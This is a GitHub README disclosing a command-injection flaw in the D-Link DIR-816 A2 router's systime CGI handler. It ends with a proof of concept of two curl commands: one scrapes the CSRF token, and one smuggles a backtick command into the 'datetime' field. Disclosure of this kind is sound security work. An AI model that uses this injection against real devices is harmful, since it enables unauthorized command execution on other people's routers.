Skip to content

Latest commit

 

History

History
33 lines (19 loc) · 1 KB

README.md

File metadata and controls

33 lines (19 loc) · 1 KB

D-Link DIR-816 A2 Command Injection

Vender :D-Link

Firmware version:1.10 B05

Exploit Author: nabla@galaxylab.org

Vendor Homepage: http://www.dlink.com.cn/

Hardware Link:http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-816

Vul detail

In the handler of route /goform/form2systime.cgi, the value of parameter datetime is used in the construction of command date -s "%s", which is later fed to system:

So it could lead to command injection with crafted request.

POC

There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:

TOKENID=`curl -s http://192.168.0.1/dir_login.asp | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`

Then we could send the crafted parameter along with the token to the route:

curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=$TOKENID -d 'datetime=`sleep 5`-:'